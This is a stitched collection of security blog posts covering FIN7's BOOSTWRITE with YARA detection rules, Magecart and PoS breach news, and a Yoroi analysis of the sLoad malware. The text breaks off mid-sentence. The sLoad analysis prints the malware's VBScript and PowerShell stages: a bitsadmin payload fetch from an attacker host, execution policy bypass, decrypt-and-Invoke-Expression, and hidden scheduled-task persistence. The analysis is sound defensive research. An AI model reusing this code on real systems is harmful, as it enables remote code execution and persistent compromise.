There are other PE Authenticode anomalies that can also be represented as Yara rules to surface similarly suspicious files. Of note, this signed BOOSTWRITE sample has no counter signature and, while the unauthenticated attributes timestamp structure is present, it is empty. In preparing this blog, FireEye’s Advanced Practices team identified a possible issue with VirusTotal’s parsing of signed executable timestamps as seen in Figure 4.

Figure 4: Inconsistency in VirusTotal file signature timestamps for the signed BOOSTWRITE sample

FireEye filed a bug report with Google to address the discrepancy in VirusTotal in order to remove confusion for other users.

To account for the detection weaknesses introduced by techniques like code signing, our Advanced Practices team combines the malicious confidence spectrum that comes from ML detection systems with file oddities and anomalies (weak signals) to surface highly interesting and evasive malware. This technique was recently described in our own Dr. Steven Miller’s Definitive Dossier of Devilish Debug Details. In fact, the exact same program database (PDB) path-based approach from his blog can be applied to the toolmarks seen in this sample for a quick hunting rule. Figure 5 provides the PDB path of the BOOSTWRITE samples from this blog.


Figure 5: BOOSTWRITE PDB path

The Yara rule template can be applied to result in the quick rule in Figure 6.

rule ConventionEngine_BOOSTWRITE
     author = "Nick Carr (@itsreallynick)"
     reference = ""
     $weetPDB = /RSDS[\x00-\xFF]{20}[a-zA-Z]?:?\\[\\\s|*\s]?.{0,250}\\DWriteImpl[\\\s|*\s]?.{0,250}\.pdb\x00/ nocase
     (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $weetPDB and filesize < 6MB

Figure 6: Applying BOOSTWRITE’s PDB path to a Yara rule

We can apply this same concept across other executable traits, such as BOOSTWRITE’s export DLL name (DWriteImpl.dll), to create quick and easy rules that can aid in quick discovery as seen in Figure 7.

rule Exports_BOOSTWRITE
     author = "Steve Miller (@stvemillertime) & Nick Carr (@itsreallynick)"
     $exyPants = "DWriteImpl.dll" nocase
     uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $exyPants at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12)) and filesize < 6MB

Figure 7: Applying BOOSTWRITE’s export DLL names to a Yara rule (Note: this rule was updated following publication. It previously read "module_ls.dll", which is for Turla and unrelated.)

Of course, resilient prevention capabilities are needed and to that end, FireEye detects this activity across our platforms. Table 6 contains several specific detection names from a larger list of detection capabilities that captured this activity natively.


Signature Name

Endpoint Security

MalwareGuard ML detection (unsigned variants)

Network Security and Email Security

Malware.binary.dll (dynamic detection)
MalwareGuard ML detection (unsigned variants)
APTFIN.Dropper.Win.BOOSTWRITE (network traffic)
APTFIN.Backdoor.Win.RDFSNIFFER (network traffic)
FE_APTFIN_Dropper_Win_BOOSTWRITE (static code family detection)
FE_APTFIN_Backdoor_Win_RDFSNIFFER (static code family detection)

Table 6: FireEye detection matrix

Don’t Sweat the Techniques – MITRE ATT&CK Mappings






Data Encrypted

BOOSTWRITE encodes its payloads using a ChaCha stream cipher with a 256-bit key and 64-bit IV to evade detection


Obfuscated Files or Information

BOOSTWRITE encodes its payloads using a ChaCha stream cipher with a 256-bit key and 64-bit IV to evade detection


DLL Search Order Hijacking

BOOSTWRITE exploits the applications’ loading of the ‘gdi’ library, which loads the ‘gdiplus’ library, which ultimately loads the local ‘Dwrite’ dll


Code Signing

BOOSTWRITE variants were observed signed by a valid CA


Execution through Module Load

BOOSTWRITE exploits the applications’ loading of the ‘gdi’ library, which loads the ‘gdiplus’ library, which ultimately loads the local ‘Dwrite’ dll


Deobfuscate/Decode Files or Information

BOOSTWRITE decodes its payloads at runtime using using a ChaCha stream cipher with a 256-bit key and 64-bit IV






Execution through API

RDFSNIFFER hooks several Win32 API functions intended to enable it to tamper with NCR Aloha Command Center Client sessions or hijack elements of its user-interface


File Deletion

RDFSNIFFER has the capability of deleting local files



RDFSNIFFER hooks several Win32 API functions intended to enable it to tamper with NCR Aloha Command Center Client sessions or hijack elements of its user-interface


The authors want to thank Steve Elovitz, Jeremy Koppen, and the many Mandiant incident responders that go toe-to-toe with FIN7 regularly, quietly evicting them from victim environments. We appreciate the thorough detection engineering from Ayako Matsuda and the reverse engineering from FLARE’s Dimiter Andonov, Christopher Gardner and Tyler Dean. A special thanks to FLARE’s Troy Ross for the development of his PE Signature analysis service and for answering our follow-up questions. Shout out to Steve Miller for his hot fire research and Yara anomaly work. And lastly, the rest of the Advanced Practices team for both the unparalleled front-line FIN7 technical intelligence expertise and MITRE ATT&CK automated mapping project – with a particular thanks to Regina Elwell and Barry Vengerik.

NCSC Cyber Essentials Scheme to be Streamlined

The UK National Cyber Security Centre (NCSCCyberEssentials Scheme is to be streamlined from 1stApril 2020, with IASME named as sole partner.

It will become easier for UK businesses to protect themselves from the most common cyber-attacks as the UK government-backed cybersecurity scheme is streamlined.
  • The Cyber Essentials Scheme is supported by the UK government to help businesses guard against the most common cyber threats.
  • Over 30,000 UK businesses have gained Cyber Essentials certification since its launch in 2014 and this number is growing year on year.
  • Naming IASME as the sole Cyber Essentials partner will streamline and grow the Scheme and ensure it keeps pace with the changing nature of the cybersecurity threat.
Cyber Essentials Scheme launched in 2014

Since its launch in 2014 the Cyber Essentials Scheme has helped to protect over 30,000 UK businesses from the most common cyber-threats. NCSC and IASME are committed to growing the Scheme, recognising its role in helping to make the UK one of the safest places to live and do business online.

The Cyber Essentials Scheme was developed to protect organisations against low-level “commodity threats”. It focuses on the five most important technical security controls that businesses should have in place to prevent malicious attacks. These controls were identified by the government as those that, if they had been in place, would have stopped the majority of the successful cyber-attacks over the last few years.

The success of Cyber Essentials Scheme means that it remains at the heart of the UK Government’s National Cyber Security Strategy, but an extensive consultation process highlighted the need to evolve the Scheme.

Since its launch, Cyber Essentials has been delivered through multiple Accreditation Bodies and their respective Certification Bodies. In order to simplify the customer experience and improve consistency, the NCSC have appointed a single Cyber Essentials partner to take over running the Scheme from 1stApril 2020. This will make the Scheme easier to run on a day to day basis and streamline the development process to ensure Cyber Essentials remains relevant. From now until 1st April 2020 the Scheme will be  very much business as usual with organisations able to gain accreditation from all five Accreditation Bodies.

The current Certification Bodies have been instrumental in the success of the Cyber Essentials Scheme. Existing Certification Bodies will be encouraged to apply to the new Cyber Essentials Partner to continue to provide Cyber Essentials as part of the revised scheme. The Scheme also welcomes new Certification Bodies or anyone from the cyber security industry interested in promoting the Scheme.

IASME Chief Executive, Dr Emma Philpott, MBE, said: We are extremely excited about the prospect of working in partnership with the NCSC to develop and grow the Cyber Essentials scheme. We have seen such a positive effect already over the last 5 years where Cyber Essentials has increased the basic levels of security across all sectors. We are so pleased that we can be part of the future developments, working closely with the excellent Certification Bodies, trade bodies, police and other key stakeholders, to ensure further growth of the scheme.”

Anne W, NCSC Head of Commercial Assurance Services, added: “The NCSC is looking forward to working in partnership with the IASME team to ensure that the scheme continues to evolve and meet the cyber security challenges of tomorrow; a scheme that puts cyber security within reach of the vast majority of UK organisations.”

Experts found a link between a Magecart group and Cobalt Group

Researchers from MalwareBytes and HYAS Threat Intelligence linked one of the hacking groups under the Magecart umbrella to the notorious Cobalt cybercrime Group.

Hacker groups under the Magecart umbrella continue to target organizations worldwide to steal payment card data with so-called software skimmers. Security firms have monitored the activities of a dozen groups at least since 2010

According to a joint report published by RiskIQ and FlashPoint, some groups are more advanced than others, in particular, the gang tracked as Group 4 appears to be very sophisticated.

The list of victims of the groups is long and includes several major platforms such as British AirwaysNeweggTicketmasterMyPillow and Amerisleep, and Feedify

Millions of Magecart instances were detected over time, security experts discovered tens of software skimming scripts.

Researchers at RiskIQ estimate that the group has impacted millions of users. RiskIQ reports a total of 2,086,529 instances of Magecart detections, most of them are supply-chain attacks.

The same team of experts has determined that the Magecart infrastructure is vast, with 573 known C2 domains, and 9,189 hosts observed loading C2 domains. 

A new joint report published by researchers at Malwarebytes and HYAS Threat Intelligence reveals that some groups under the Magecart umbrella are linked to Magecart attackers.

The experts found a link between the Magecart Group 4 and the Cobalt cybercrime Gang, such as patterns in the email addresses used to register domains used in Magecart operations.

“One group that caught our interest is Group 4, which is one of the more advanced cybercriminal organizations. While working jointly with security firm HYAS, we found some interesting patterns in the email addresses used to register domains belonging to Magecart matching those of a sophisticated threat group known as Cobalt Group, aka Cobalt Gang or Cobalt Spider.” reads the blog post published by MalwareBytes.

Cobalt crime gang is a Russian hacking crew that has been active since at least 2016, it targeted banks worldwide, the group leveraged spear-phishing emails to compromise target systems, spoofed emails from financial institutions or a financial supplier/partner.

Experts pointed out that Group 4, unlike other Magecart groups, leverages on both client-side and server-side skimmers.

One of client-side skimmers analyzed by the researchers was masqueraded as the jquery.mask.js plugin, the attackers appended the malicious code at the end of the script and protected it with some layers of obfuscation. 

Experts also analyzed a server-side skimmer, it is a PHP script that was mistakenly served as JavaScript instead.

“This little code snippet looks for certain keywords associated with a financial transaction and then sends the request and cookie data to the exfiltration server at secureqbrowser[.]com. An almost exact copy of this script was described by Denis Sinegubko of Sucuri in his post Autoloaded Server-Side Swiper.” continues the report.

Experts noticed that in both attacks, the domains were registered to robertbalbarran(at)

The analysis of the exfiltration gates allowed the researchers to link them to other registrant emails and identify a pattern for the format of email addresses ([first name][initial][last name]).

Experts noticed that the Cobalt Group also has switched to this technique.

“A small shift from one of their previous conventions of [firstname],[lastname], [fournumbers] (overwhelmingly using protonmail accounts, with a handful of tutanota/ email accounts) changed to the above-noted convention of [firstname], [initial], [lastname] again using the same email services and registrars, and notably the same use of privacy protection services.” continues the experts.

Further investigation allowed the experts to discover that 10 of the seemingly separate accounts reused only two different IP addresses, even over weeks and months between registrations.

One email address, petersmelanie(at), was used to register 23 domains, including one involved in a phishing campaign leveraging the CVE-2017-0199 flaw and other attacks against Oracle and various banks.

“Based on their historical ties to the space, and the entrance of sophisticated actor groups such as FIN6 and others, it’s logical to conclude that Cobalt Group would also enter this field and continue to diversify their criminal efforts against global financial institutions,” concludes the report. “The use of both client-side and server-side skimmers and the challenges this poses in identifying Magecart compromises by advanced threat groups necessitates the ongoing work of industry partners to help defend against this significant and growing threat.”

Pierluigi Paganini

(SecurityAffairs – Magecart, Cobalt group)

The post Experts found a link between a Magecart group and Cobalt Group appeared first on Security Affairs.

PoS malware infections impacted four restaurant chains in the U.S.

Four restaurant chains in the U.S. disclosed payment card theft via PoS malware that took place over the summer.

Four restaurant chains in the United States disclosed security breaches that impacted their payment systems over the summers, crooks used PoS malware to steal payment card data of the customers.

The restaurant chains are McAlister’s Deli, Moe’s Southwest Grill, Schlotzsky’s, and Hy-Vee, they confirmed the presence of PoS malware at certain locations.

Moe’s, McAlister’s and Schlotzsky’s are owned by Focus Brands, the fact that they simultaneously disclosed the payment card breaches suggests that attackers were able to compromise some infrastructure shared by the two restaurant chains.

The three restaurant chains confirmed that hackers compromised the payment systems in a period between April 29, 2019 and July 22, 2019. 

“A thorough investigation is being conducted and is nearly complete. It appears that unauthorized code designed to copy payment card data from cards used in person was installed in certain corporate and franchised restaurants at different times over the general period of April 29, 2019 to July 22, 2019.” reads an excerpt of a data breach notification published by the three brands.

Only Schlotzsky’s reported that the attacks begun on April 11, 2019, the other two confirmed that attacks started on April 29.

The three restaurant chains reported that the PoS malware was discovered only at certain locations, and at most locations it was present for only a few weeks in July.

The brands did not reveal the number of impacted customers.

Customers were initially alerted about the incident on August 20, when the restaurant chains were investigating the security incidents.

The PoS malware was designed to capture data from the magnetic stripe of a payment card during the payment process, including the card number, expiration date, and internal verification code, and sometimes it the cardholder name.

The fourth brand that suffered a payment card breach is Hy-Vee, the restaurant chain provided an update to the notice of payment card data incident released on August 14.

The company confirmed that on July 29, crooks compromised some payment processing systems, in this case, the PoS malware remained active more than a month.

The update provided by the company revealed that infections at the fuel pumps began on December 14, 2018, while payment systems at restaurants and drive-thru coffee shops were infected starting January 15.

“The specific timeframes when data from cards used at these locations involved may have been accessed vary by location over the general timeframe beginning December 14, 2018, to July 29, 2019 for fuel pumps and beginning January 15, 2019, to July 29, 2019, for restaurants and drive-thru coffee shops.” reads the update provided by the company. “There are six locations where access to card data may have started as early as November 9, 2018, and one location where access to card data may have continued through August 2, 2019.”

The company also published a Location Look Up Tool to determine the Hy-Vee impacted locations.

Pierluigi Paganini

(SecurityAffairs – restaurant chains, PoS malware)

The post PoS malware infections impacted four restaurant chains in the U.S. appeared first on Security Affairs.

Security Affairs newsletter Round 234

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Hi folk, let me inform you that I suspended the newsletter service, anyway I’ll continue to provide you a list of published posts every week through the blog.

Once again thank you!

Hacker claims to have stolen over 218M Zynga ‘Words with Friends Gamers records

Masad Stealer Malware exfiltrates data via Telegram

Phishers continue to abuse Adobe and Google Open Redirects

WhiteShadow downloader leverages Microsoft SQL to retrieve multiple malware

A new critical flaw in Exim exposes email servers to remote attacks

Arcane Stealer V, a threat for lower-skilled adversaries that scares experts

eGobbler ‘s malvertising campaign hijacked over 1 billion ad impressions

Exclusive: MalwareMustDie analyzes a new IoT malware dubbed Linux/ AirDropBot

Irans oil minister orders ‘Full Alert for oil sector on against attacks

Microsoft will add new file types to the list of blocked ones in Outlook on the Web

A new Adwind variant involved in attacks on US petroleum industry

Danish company Demant expects to incur losses of up to $95 after cyber attack

Danish company Demant expects to incur losses of up to $95 Million after cyber attack

Frequent VBA Macros used in Office Malware

Gucci IOT Bot Discovered Targeting European Region

Hackers breached one of Comodo Forums, 245,000 users impacted

Singapore presented the Operational Technology (OT) Cybersecurity Masterplan

Teheran: U.S. has started ‘Cyber War against Iran

Tridium Niagara framework affected by 2 flaws in BlackBerry QNX OS

Asics apologizes after pornography ran on screens at central store in Auckland for hours

Expert disclosed details of remote code execution flaw in Whatsapp for Android

Experts found 20 Million tax records for Russian citizens exposed online

Former American Express employee under investigation for customers data abuse

Ten hospitals in Alabama and Australia have been hit with ransomware attacks

Zendesk 2016 security breach may impact Uber, Slack, and other organizations

6 cyber-espionage campaigns since 2013 attributed to PKPLUG China-linked group

Dutch police shut down bulletproof service hosting tens of DDoS botnets

FBI warns about high-impact Ransomware attacks on U.S. Organizations

Ukrainian police dismantled a bot farm involved in multiple spam campaigns

US Secretary of State Mike Pompeo warns Italy over 5G Chinese equipment supply

Egypt regularly spies on opponents and activists with mobile apps

Project Zero researcher found unpatched Android zero-day likely exploited by NSO group

The sLoad Threat: Ten Months Later

Magecart hackers are expanding their operations

NSA Launches New Cybersecurity Directorate


Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 234 appeared first on Security Affairs.

Magecart hackers are expanding their operations

Cybercrime gangs under the Magecart umbrella continue to compromise e-commerce platforms to steal payment card data from users worldwide.

Hacker groups under the Magecart umbrella continue to target organizations payment card data with so-called software skimmers. Security firms have monitored the activities of a dozen groups at least since 2010

According to a joint report published by RiskIQ and FlashPoint, some groups are more advanced than others, in particular, the gang tracked as Group 4 appears to be very sophisticated.

The list of victims of the groups is long and includes several major platforms such as British AirwaysNeweggTicketmasterMyPillow and Amerisleep, and Feedify

Millions of Magecart instances were detected over time, security experts discovered tens of software skimming scripts.

In a report recently published by RiskIQ, experts estimate that the group has impacted millions of users. RiskIQ reports a total of 2,086,529 instances of Magecart detections, most of them are supply-chain attacks.

“Suppliers can include vendors that integrate with sites to add or improve site functionality or cloud resources from which websites pull code, such as Amazon S3 Buckets. These third-parties integrate with thousands of websites” states the report.

Magecart group tracked as MG5 (Group 5) appears to be the most sophisticated and prolific group. MG5 focuses on supply chain attacks, it is responsible for the hack of hundreds of websites and providers such as SociaPlus and Inbenta.

In June, the gang made the headlines again, after infecting over 17,000 domains by targeting improperly secured Amazon S3 buckets

Recently, IBM researchers observed one of the MG5 group 5 using malicious code to inject into commercial-grade layer 7 L7 routers.

According to RiskIQ, many groups under the umbrella still focus on e-commerce sites powered with the Magento shopping or OpenCart platform.


Following a consolidated pattern of attack that is common in the hacking community, Magecart attempt to exploit vulnerabilities that the victims have yet to patch even is security updates have been released by Magento and other software vendors.

Attackers also look for new attack vectors to distribute their software skimming, such as compromising creative ad script tags to leverage digital ad networks to generate traffic to their skimmers and hit thousands of sites at once.

RiskIQ report revealed that of all malicious advertisements it has analyzed, the 17% is associated with the Magecart groups.

Below other interesting insights included in the report:

  • 17% of all Malvertisements detected by RiskIQ contain Magecart skimmers
  • The average length of a Magecart breach is 22 days with many lasting years, or even indefinitely.
  • Shopping platforms such as Magento and OpenCart are the lifeblood of many Magecart groups. RiskIQ has detected 9,688 vulnerable Magento hosts.
  • Magecart infrastructure is vast, with 573 known C2 domains, and 9,189 hosts observed loading C2 domains. 
  • Because Magecart skimmers stay on websites for so long, threat actors are purchasing Magecart infrastructure that’s gone offline to assume access to these breached sites. 

The full report, containing additional insights and information, is available for download here:

Pierluigi Paganini

(SecurityAffairs – software skimmers, hacking)

The post Magecart hackers are expanding their operations appeared first on Security Affairs.

The sLoad Threat: Ten Months Later

Since September 2018, SLoad (tracked as TH-163) is the protagonist of an increasing and persistent wave of attacks against Italian organizations.


SLoad (TH-163) is the protagonist of increasing and persistent attack waves against the Italian panorama since Q3 2018 and then in 2019 (e.g N020419N040619N010819), but also against the UK and Canada as reported by Proofpoint. Ten months ago, we wrote about the complex infection chain the sLoad malware threat was using during its attack campaigns, and today we are looking at the evolution of the threat by dissecting one of its latest attacks.

During our CSDC monitoring operation, we recently noticed some changes in the infamous attack waves related to sLoad, which is known for adopting a complex infection chain using to spread additional malware. For this reason Cybaze-Yoroi ZLAB dissected one latest ones.

Technical Analysis

According to CERT-PA investigations, the malware has recently been delivered using legit certified emails (PEC). These recent attack waves were targeting Italians Organizations and consultants affiliated to Professional associations, such as lawyers and civil engineers. Once again the attachment is a malicious zip. 

Figure 1: Example of mail (source:CERT-PA)

The Infection Chain

Figure 2: Files contained in attachment file zip

This time the zip does not hide powershell code, such the appended one recovered in the past waves. The archive contains two files: a corrupted PDF file and a VBScript. The first one is designed to deceive the unaware user and force him to open the runnable script.

In the following tables are shown some basic information about samples contained in the zip archive.

Threat.vbs dropper
Brief DescriptionSload visual basic script loader

Table 1: Information about SLoad .vbs dropper

Threat.pdf file
Brief DescriptionSload corrupted pdf file

Table 2: Information about SLoad .pdf file

Opening the vbs dropper is possible to see an obfuscated script containing several junk instructions like unused variables and commented codes. After a deobfuscation phase is possible to see the inner logic. The purpose of this script is launch start a powershell script retrieved from the attacker infrastructures and, in the meantime, decoy the victim.

  1. On Error Resume Next
  2. Set ZCzG = CreateObject(“Scripting.FileSystemObject”)
  3. Set PavfQt = WScript.CreateObject (“WScript.Shell”)
  4. Set XaiX = ZCzG.GetFolder(“c:\Users\”)
  5. Recurse(XaiX)
  6. “bitsadmin /transfer OkFCVS /download /priority FOREGROUND c:\Users\Public\Downloads\RSbYHuPO.ps1”,0,True
  7. i=0
  8. Do While i < 1
  9. If (ZCzG.FileExists(“c:\Users\Public\Downloads\RSbYHuPO.ps1”)) Then
  10. i=1
  11. End If
  12. WScript.Sleep(2280)
  13. Loop
  14. “powershell.exe -ep bypass -file c:/users/public/downloads/RSbYHuPO.ps1 “,0,True
  15. Sub Recurse(JFLY)
  16. If IsAccessible(JFLY) Then
  17. For Each oSubFolder In JFLY.SubFolders
  18. Recurse oSubFolder
  19. Next
  20. For Each RIst In JFLY.Files
  21. If InStr(RIst.Name,”.pdf”) > 0 Then
  22. “explorer “+JFLY+”\”+RIst.Name
  23. End if
  24. Next
  25. End If
  26. End Sub
  27. Function IsAccessible(XaiX)
  28. On Error Resume Next
  29. IsAccessible = (XaiX.SubFolders.Count >= 0)
  30. End Function

Code snippet 1: Deobfuscated vbs dropper

The malware downloads a fake jpg using the using “bitsadmin.exe”  tool from “hxxps://dreamacinc[.com/UCP9dATGyt6mJ/srdzHcN4bWUum[.jpg”. The usage of native tools allow the script to operate under the radar avoiding several AVs controls. The fake jpg actually contains a powershell script. 

  1. $oLZz2= “C:\Users\admin\AppData\Roaming”;
  2. $YwbpkcN9XUIv1w=@(1..16);
  3. […]
  4. $main_ini=’76492d1116743f0423413b16050a5345MgB8ADUAVAB4 […] AMQAyAGYA’;
  5. $main_ini | out-file $PaIQGLoo’\main.ini’;
  6. $domain_ini=’76492d1116743f0423413b1605 […] YwBlAA==’;
  7. $domain_ini | out-file $PaIQGLoo’\domain.ini’;
  8. […]
  9. try{ […]
  10. }catch{$yC0iBerAupzdtf5Z=Get-Process -name powershell*;
  11. if ($yC0iBerAupzdtf5Z.length -lt 2){
  12. $EXhfbIPG7pUAEZzgZEnM = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;
  13. $r=8;
  14. $B3xcDMBF=$EXhfbIPG7pUAEZzgZEnM.Substring(0,$r);
  15. $zjGQzSypyGPthusR = $047MydhkAAfp1W+”\”+$B3xcDMBF;
  16. $sv8eJJhgWV3xAN7Uu=@(1..16);
  17. $umwTVcIoudRlXjR6yAQQ= Get-Content “main.ini”$MLUkmHrgbpKyVEt8nS= ConvertTo-SecureString $umwTVcIoudRlXjR6yAQQ -key $sv8eJJhgWV3xAN7Uu;
  18. $AKXy3OFCowsfie = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($MLUkmHrgbpKyVEt8nS);
  19. $DBR4S3t = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($AKXy3OFCowsfie);
  20. Invoke-Expression $DBR4S3t;
  21. }
  22. } | out-file $PaIQGLoo’\’$H3z9RnzIihO8′.ps1′
  23. $OFHc0H4A=’ /F /create /sc minute /mo 3 /TN “S’+$rs+$fLCg9ngJqRHX36hfUr+'” /ST 07:00 /TR “wscript /E:vbscript ‘+$PaIQGLoo+’\’+$JxdRWnHC+’.tmp”‘;
  24. start-process -windowstyle hidden schtasks $OFHc0H4A; […]

Code snippet 2: Downloaded powershell code

The first action the script  does is to set a scheduled task to grant persistence on the infected machine. Then, after selection a random active process on infected machine (“System” in this specific infection) and concatenation it with the “%AppData%\Roaming” path, it stores four different files in his installation folder.

  • <random_name>.tmp
  • <random_name>.ps1
  • domain.ini
  • main.ini

All of them are embedded in the script; furthermore, two of them (“domain.ini” and “main.ini”)  are encrypted using the “ConvertFrom-SecureString”  native function. Then, the script runs the “UoqOTQrc.tmp” file, having the only purpose to execute the “UoqOTQrc.ps1” file contained in the same folder.

Figure 3: Files created in “%AppData%\Roaming\<active_process>\”
  1. Dim str, min, max
  2. Const LETTERS = “abcdefghijklmnopqrstuvwxyz”
  3. min = 1
  4. max = Len(LETTERS)
  5. Randomize
  6. […]
  7. Set objFSO=CreateObject(“Scripting.FileSystemObject”)
  8. Set winssh = WScript.CreateObject (“WScript.Shell”)
  9. fName=RandomString(10)
  10. JAcalshy=RandomString(4)
  11. fZgxNPDMnu=RandomString(4)
  12. WEHxctVdTEoDfqEqJMP=RandomString(4)
  13. […]
  14. Set objFile = objFSO.CreateTextFile(outFile,8, True)
  15. objFile.Write “Set “+JAcalshy+”=rshe” & vbCrLf
  16. objFile.Write “Set “+fZgxNPDMnu+”=ypa” & vbCrLf
  17. objFile.Write “Set “+WEHxctVdTEoDfqEqJMP+”=il” & vbCrLf
  18. objFile.Close
  19. “powershell -ep bypass -file .ps1”,0,true

Code snippet 3: content of “UoqOTQrc.tmp” file.

  1. try{
  2. Remove-EventLog:Debug-Job
  3. Export-BinaryMiLog:Get-PSSessionConfiguration
  4. Remove-JobTrigger:New-Item
  5. }catch{
  6. $yC0iBerAupzdtf5Z=Get-Process -name powershell*;
  7. if ($yC0iBerAupzdtf5Z.length -lt 2){
  8. $EXhfbIPG7pUAEZzgZEnM = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;$r=8;
  9. $B3xcDMBF=$EXhfbIPG7pUAEZzgZEnM.Substring(0,$r);
  10. $zjGQzSypyGPthusR = $047MydhkAAfp1W+”\”+$B3xcDMBF;
  11. $sv8eJJhgWV3xAN7Uu=@(1..16);
  12. $umwTVcIoudRlXjR6yAQQ= Get-Content “main.ini”
  13. $MLUkmHrgbpKyVEt8nS= ConvertTo-SecureString $umwTVcIoudRlXjR6yAQQ -key $sv8eJJhgWV3xAN7Uu;
  14. $AKXy3OFCowsfie =
  15. [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($MLUkmHrgbpKyVEt8nS);
  16. $DBR4S3t = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($AKXy3OFCowsfie);
  17. Invoke-Expression $DBR4S3t;
  18. }

Code snippet 4: content of “UoqOTQrc.ps1” file.

In the same way, the “UoqOTQrc” script decrypts the “mini.ini” file using the “ConvertFrom-SecureString” function and the ecnryption key contained in “$sv8eJJhgWV3xAN7Uu” variable, a sequential integer array. 

Figure 4: “main.ini” file before and after decryption

The decrypted “main.ini” script tries to ping a URL generated selecting three ascii char-codes in ranges [65-90] and [67-122]. Then, it decrypts “domain.ini” using the key in the “$main_key” variable. In the end, it saves the results in the “btc.log” file. Continuing the analysis of “main.ini” is possible to spot that the script also grabs system information to check-in the newly infected host.

Figure 5: “domain.ini” file before and after decryption
Figure 6: Some information exfiltrate by the malware before and after base64 decoding

At this point, another malicious file is downloaded. The malware retrieves it from “hxxps://<C2_URL>/doc/x2401.jpg”. Once again, this is not a real jpg, but rather another obfuscated powershell layer.

  1. $u2K2MQ4 = “`r`n”
  2. $lNlNrKyk= –join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_})
  3. $yIXgWSaXsKD5hanf9uO= $env:userprofile+’\App’+’Da’+’ta\Ro’+’am’+’ing’;
  4. $hh=’hi’+’dd’+’en’;
  5. $ixXApGeqJKEGY=@(1..16);
  6. $Erlydjiyy = (Get-WmiObject Win32_ComputerSystemProduct);
  7. $Erlydj = $Erlydjiyy.UUID;
  8. $sOmUGoc0ysV8UW=$Erlydj.Substring(0,6);
  9. $Z5lTNXB = $yIXgWSaXsKD5hanf9uO+”\”+$sOmUGoc0ysV8UW;
  10. If(!(test-path $Z5lTNXB)){New-Item -ItemType Directory -Force -Path $Z5lTNXB}
  11. If(test-path $Z5lTNXB”\_in”){$gQd0DB82ByQ0pziwKZ=Get-ChildItem $Z5lTNXB”\_in”;$FQDO2rSjJJxrkrYFWM1W = Get-Date;if ($gQd0DB82ByQ0pziwKZ.LastWriteTime -gt $FQDO2rSjJJxrkrYFWM1W.AddMinutes(-30)){break;break;}}; “1” | out-file $Z5lTNXB”\_in”;
  12. try{ Remove-Item $Z5lTNXB’\*’}catch{}
  13. $wsxDITPgQCH+=’76492d1116743f0423413b16050a5345MgB8AGsAKwBwAHkASQBUAGgAWgBKAEsAbgBFAE8AUQBHA’;
  14. […]
  16. $wsxDITPgQCH+=’3ADAANQA1AA==’;
  17. $wsxDITPgQCH | out-file $Z5lTNXB’\config.ini’;
  18. $5r8DcJB4ok4+=’76492d1116743f0423413b16050a5345MgB8AHQAYgBqAFYAVQBQADUAQwBNAGEAZABWAFMA’;
  19. […]
  21. $5r8DcJB4ok4 | out-file $Z5lTNXB’\web.ini’;
  22. start-process -windowstyle $hh schtasks ‘/change /tn GoFast /disable’;
  23. $2aWxu9dutZfOPCCgS+=$u2K2MQ4+’Dim ‘;
  24. […]
  25. $nz0oninX6=$ixXApGeqJKEGY -join ‘,’;
  26. $E6M6Np8nhXnu4ndPEJ=’ /F /create /sc minute /mo 3 /TN “U’+$sOmUGoc0ysV8UW+'” /ST 07:00 /TR “wscript /E:vbscript ‘+$Z5lTNXB+’\’+$lNlNrKyk+’.tmp”‘;
  27. start-process -windowstyle $hh schtasks $E6M6Np8nhXnu4ndPEJ;

Code snippet 5: Obfuscated content of “x2401.jpg” file.

  1. $u2K2MQ4 = “rn”;
  2. $lNlNrKyk= –join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_});
  3. $yIXgWSaXsKD5hanf9uO= $env:userprofile+’\AppData\Roaming’;
  4. $Erlydjiyy = (Get-WmiObject Win32_ComputerSystemProduct);
  5. $Erlydj = $Erlydjiyy.UUID;
  6. $sOmUGoc0ysV8UW=$Erlydj.Substring(0,6);
  7. $Z5lTNXB = $yIXgWSaXsKD5hanf9uO+”\”+$sOmUGoc0ysV8UW;
  8. If(!(test-path $Z5lTNXB)){New-Item -ItemType Directory -Force -Path $Z5lTNXB}
  9. If(test-path $Z5lTNXB”\_in”){$gQd0DB82ByQ0pziwKZ=Get-ChildItem $Z5lTNXB”\_in”;$FQDO2rSjJJxrkrYFWM1W = Get-Date;if ($gQd0DB82ByQ0pziwKZ.LastWriteTime -gt $FQDO2rSjJJxrkrYFWM1W.AddMinutes(-30)){break;break;}}; “1” | out-file $Z5lTNXB”\_in”;
  10. try{ Remove-Item $Z5lTNXB’\*’}catch{}
  11. $wsxDITPgQCH=”76492d1 […] A1AA==”;
  12. $wsxDITPgQCH | out-file $Z5lTNXB’\config.ini’;
  13. $5r8DcJB4ok4=”7649 […] AGIA”;
  14. $5r8DcJB4ok4 | out-file $Z5lTNXB’\web.ini’;
  15. start-process -windowstyle hidden schtasks ‘/change /tn GoFast /disable’;
  16. $2aWxu9dutZfOPCCgS=”Dim winssh […] “powershell -ep bypass -file vJjFwtSM.ps1″,0,true”;
  17. $2aWxu9dutZfOPCCgS | out-file $Z5lTNXB’\’$lNlNrKyk’.tmp’
  18. $r1uIiPZBhUea0=” $zTxePJtpmbVI0btT6cd9=Get-Process -name powershell*; […] Invoke-Expression $NLO3lwvn1xWn;}”;
  19. $r1uIiPZBhUea0 | out-file $Z5lTNXB’\’$lNlNrKyk’.ps1′
  20. $nz0oninX6=”1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16″;
  21. $E6M6Np8nhXnu4ndPEJ=”/F /create /sc minute /mo 3 /TN “U52A34D” /ST 07:00 /TR “wscript /E:vbscript C:\Users\admin\AppData\Roaming\52A34D\vJjFwtSM.tmp”;
  22. start-process -windowstyle hidden schtasks $E6M6Np8nhXnu4ndPEJ;

Code snippet 6: Deobfuscated content of “x2401.jpg” file.

Like previous script, this one perform the same operations and create other four file in “%AppData%\Roaming\<active_process>” path. This time the files are:

